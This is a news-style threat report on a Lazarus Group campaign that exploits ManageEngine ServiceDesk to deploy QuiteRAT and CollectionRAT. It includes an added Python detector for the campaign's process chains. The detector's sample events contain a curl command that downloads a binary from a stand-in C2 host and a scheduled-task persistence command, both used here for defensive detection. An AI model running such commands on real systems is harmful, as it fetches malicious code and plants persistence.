Researchers have discovered that the Lazarus APT group has initiated a fresh initiative aimed at internet backbone infrastructure and healthcare organizations situated in Europe and the U.S.
Threat actors started their attack by taking advantage of a vulnerability within ManageEngine ServiceDesk tracked as CVE-2022-47966.
The vulnerability was exploited to establish initial access, after which a malicious binary was downloaded and executed through the Java runtime process, launching the implant on the compromised server.
This binary represents a modified version of the group’s MagicRAT malware, dubbed QuiteRAT. They also used a malware named CollectionRAT that functions as a RAT capable of executing arbitrary commands on a compromised system.
Researchers could establish a connection between CollectionRAT and Jupiter RAT, a malicious software previously associated with the Andariel APT faction, which operates under the umbrella of the Lazarus Group.
QuiteRAT is constructed using the Qt framework, an open-source, cross-platform framework designed for crafting applications. It boasts functionalities such as arbitrary command execution.
The Lazarus Group incorporated only the essential Qt libraries into QuiteRAT, whereas MagicRAT embedded the entire Qt framework.
Although MagicRAT integrates mechanisms for persistence by enabling the configuration of scheduled tasks, QuiteRAT lacks inherent persistence functionality and relies on the C2 server to provide it with persistence instructions.
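Two of the behaviours described above, the ServiceDesk Java runtime spawning a downloader and binary after CVE-2022-47966 exploitation, and persistence being set up through a scheduled task (natively by MagicRAT, or by QuiteRAT only on a C2 instruction), both leave a trail in process-creation telemetry. The detector below is an added example, not code from the Cisco Talos report: it walks parent/child links over constructed Sysmon-style events and flags direct children of a ManageEngine Java process and any `schtasks /create` whose ancestry leads back to that process. All paths, PIDs, host names and command lines in it are hypothetical and are not indicators from the report.

```python
"""Added detection example (illustrative, not code from the Cisco Talos report).

Two behaviours from the write-up leave a process-creation trail:
  1. initial access: the ManageEngine ServiceDesk Java runtime spawns a
     downloader or an unexpected binary after CVE-2022-47966 exploitation;
  2. persistence: a scheduled task is created by a process whose ancestry
     leads back to that Java runtime (MagicRAT does this itself; QuiteRAT
     only when instructed by its C2 server).

Every event below is constructed for the example: paths, PIDs, host names
and command lines are hypothetical, not indicators from the report.
"""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry: one suspicious chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
              "java.exe -Dcatalina.home=C:\\ManageEngine\\ServiceDesk"),
    ProcEvent(512, 400, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c curl http://c2.invalid/x.bin -o C:\\Windows\\Temp\\x.exe"),
    ProcEvent(530, 512, r"C:\Windows\Temp\x.exe", "x.exe"),
    ProcEvent(544, 530, r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /sc onlogon /tn "Updater" /tr C:\\Windows\\Temp\\x.exe'),
    ProcEvent(600, 1, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE"),
    ProcEvent(610, 600, r"C:\Windows\System32\schtasks.exe", "schtasks /query"),
]

# Hypothetical path markers identifying the ServiceDesk-bundled JVM.
MANAGEENGINE_MARKERS = ("manageengine", "servicedesk")


def basename(path: str) -> str:
    """Last path component, tolerant of Windows separators on any host."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_manageengine_java(ev: ProcEvent) -> bool:
    img = ev.image.lower()
    return basename(img) in ("java.exe", "java") and any(m in img for m in MANAGEENGINE_MARKERS)


def build_index(events):
    return {ev.pid: ev for ev in events}


def ancestors(ev, index):
    """Walk ppid links upward; the seen-set guards against loops and reused PIDs."""
    chain, seen = [], {ev.pid}
    cur = index.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = index.get(cur.ppid)
    return chain


def find_java_spawned_processes(events):
    """Rule 1: any process the ManageEngine Java runtime spawns directly.
    A ServiceDesk JVM has little reason to launch children, so each one
    deserves review; shells and download utilities especially."""
    index = build_index(events)
    hits = []
    for ev in events:
        parent = index.get(ev.ppid)
        if parent is not None and is_manageengine_java(parent):
            hits.append(ev)
    return hits


def find_task_persistence(events):
    """Rule 2: schtasks /create run anywhere beneath that Java runtime."""
    index = build_index(events)
    hits = []
    for ev in events:
        if basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
            continue
        if any(is_manageengine_java(a) for a in ancestors(ev, index)):
            hits.append(ev)
    return hits


def run_detections(events):
    """Return the PIDs each rule flags, keyed by rule name."""
    return {
        "java_spawned": [ev.pid for ev in find_java_spawned_processes(events)],
        "task_persistence": [ev.pid for ev in find_task_persistence(events)],
    }


if __name__ == "__main__":
    for rule, pids in run_detections(SAMPLE_EVENTS).items():
        print(f"{rule}: {pids}")
```

On the constructed sample, rule 1 flags the `cmd.exe` child (PID 512) and rule 2 flags the `schtasks /create` invocation (PID 544), while the Word-launched `schtasks /query` is ignored. Rule 2 deliberately follows the full ancestry rather than only the parent, because the persistence step here runs two hops below the exploited JVM; in a real pipeline the same ancestry walk can be reused for other post-exploitation behaviour described in the write-up, such as arbitrary command execution by the implant.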
This marks the third officially documented campaign attributed to the Lazarus Group in the early months of 2023, and interestingly, this actor has consistently repurposed the same infrastructure across these operations.
This research was documented by researchers from Cisco Talos.
Indicators of Compromise